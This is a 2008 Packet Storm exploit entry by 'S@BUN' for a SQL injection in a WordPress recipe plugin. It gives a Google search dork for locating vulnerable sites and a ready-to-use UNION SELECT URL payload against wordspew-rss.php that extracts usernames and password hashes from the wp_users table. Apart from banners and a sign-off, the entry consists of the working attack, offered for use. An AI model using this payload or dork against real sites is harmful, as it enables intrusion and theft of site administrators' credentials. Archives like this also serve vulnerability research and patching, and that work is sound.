wprecipe-sql.txt

2008-02-20T00:00:00
ID PACKETSTORM:63784
Type packetstorm
Reporter S@BUN
Modified 2008-02-20T00:00:00

Description

                                        
                                            `#########################################################################  
#   
# Wordpress Plugin (wp-content/recipe) SQL Injection  
#   
#########################################################################   
#  
# AUTHOR : S@BUN   
#  
# HOME : http://www.hackturkiye.com/   
  
#########################################################################  
#  
# DORK 1 : allinurl: "wp-content/recipe"  
#   
#########################################################################  
EXPLOIT :   
  
wordspew-rss.php?id=-998877/**/UNION/**/SELECT/**/0,1,concat(0x7c,user_login,0x7c,user_pass,0x7c),concat(0x7c,user_login,0x7c,user_pass,0x7c),4,5/**/FROM/**/wp_users  
  
#########################################################################  
# S@BUN GOOD LUCKY S@BUN   
#########################################################################  
`